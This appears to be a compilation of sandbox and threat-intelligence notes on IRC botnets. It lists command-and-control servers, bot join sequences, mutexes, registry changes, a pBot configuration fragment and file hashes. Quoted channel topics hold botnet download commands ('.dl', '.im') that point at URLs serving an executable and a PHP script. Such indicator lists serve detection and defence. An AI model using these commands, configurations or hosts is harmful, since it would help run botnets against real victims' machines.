ktodumal.net (32k net)

ktodumal.net 85.12.60.20
C&C Server: 85.12.60.20:81
Server Password:
Username: n
Nickname: n[DEU|XP]0949985
Channel: #new# (Password: )
Channeltopic: :.im http://www.veyrandon-camions-magasins.fr/img/fotos.php?foto=IMG020407202010.JPG
Now talking in #inf#
Topic is '.dl http://veyrandon-camions-magasins.fr/admin/n.exe'
Set by s on Thu Apr 22 05:11:24
also channel: #newgen#
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List "C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\winvsn.exe" = C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\winvsn.exe:*:Enabled:Windows Control

class pBot

"server"=>"218.226.193.174",
"port"=>4242,
"pass"=>"", //
"prefix"=>"",
"maxrand"=>7,
"chan"=>"##xp#",
"key"=>"142536", //
"modes"=>"-x+i",
"password"=>"stop", //
"trigger"=>"!say@",
"hostauth"=>"*" // *

MicrosoftUpdate.yi.org

[ DetectionInfo ]
* Filename: C:\analyzer\scan\svcnost.exe.
* Sandbox name: W32/Backdoor.
* Signature name: Ircbot.BAYQ.
* Compressed: NO.
* TLS hooks: NO.
* Executable type: Application.
* Executable file structure: OK.
* Filetype: PE_I386.
[ General information ]
* File length: 73728 bytes.
* MD5 hash: a9bfb1db9d131e1bcce5b8f1f3132871.
* SHA1 hash: e7e8d1ce421b418a31180beb25a3e758265ea9c7.
* Entry-point detection: Microsoft Visual

irc.x2.al

Server irc.x2.al [Berisha)] Connecting to 88.84.190.62 (4243) Modded by MrAnToN e-mail mranton@hotmail.de -Anton@Berisha.info

wmim.solutionofmsn.org

Remote Host Port Number
wmim.solutionofmsn.org 1234
NICK {NEW}[USA][XP-SP2]074959
USER 1231 "" "lol" :1231
JOIN #b#
NICK [USA][XP-SP2]339973
USER 0146 "" "lol" :0146
Other details
* To mark the presence in the system, the following Mutex object was created:
  o kOiJjfhjtgK
* The following port was open in the system:
Port Protocol Process
1036 TCP msnms.exe

vunrestrained.dyndns.info

Remote Host Port Number
vunrestrained.dyndns.info 51987
NICK Unrestrained-331897
USER ercmoxzx 0 0 :Unrestrained-331897
USERHOST Unrestrained-331897
MODE Unrestrained-331897 -x+B
JOIN #Hydra#
NICK Unrestrained-231953
USER ixuzpou 0 0 :Unrestrained-231953
USERHOST Unrestrained-231953
MODE Unrestrained-231953 -x+B
NICK Unrestrained-465848
USER adwosov 0 0 :Unrestrained-465848
USERHOST Unrestrained-465848
MODE Unrestrained-465848 -x+B
Other details
* To mark the presence in the system, the

ds32v7k3.knaqu.eu

Remote Host Port Number
ds32v7k3.knaqu.eu 4244
PASS letmein
NICK [00|USA|492973]
USER XP-1626 * 0 :COMPUTERNAME
* To mark the presence in the system, the following Mutex object was created:
  o LiNbagGgsag
* The following ports were open in the system:
Port Protocol Process
1033 TCP F1reFox32.exe (%Windir%\F1reFox32.exe)
1034 TCP f1refox32.exe (%Windir%\f1refox32.exe)
* The following Host

92.241.190.166

92.241.190.166:81
Server : srv.apache.net
Now talking in #final#
Topic On: [ #final# ] [ , ]
Topic By: [ s ]
s for SnK kak pazhivajesh kolega lol

spy.burimche.net

Remote Host Port Number
spy.burimche.net 1111
NICK UserName15
USER UserName15 "hotmail.com" "spy.burimche.net" :UserName
Other details
* To mark the presence in the system, the following Mutex object was created:
  o d3st0y
* The following ports were open in the system:
Port Protocol Process
113 TCP [file and pathname of the sample #1]
1033 TCP [file

bb.milan-fans.com

Remote Host Port Number
bb.milan-fans.com 1234
NICK n[USA|XP]6675103
USER 3281 "" "lol" :3281
JOIN #cc#
NICK [USA|XP]6816119
USER 7658 "" "lol" :7658
To mark the presence in the system, the following Mutex object was created:
SLKJSN848L
The following ports were open in the system:
Port Protocol Process
1034 TCP msnmgr.exe (%Windir%\msnmgr.exe)
1036 TCP msnmgr.exe (%Windir%\msnmgr.exe)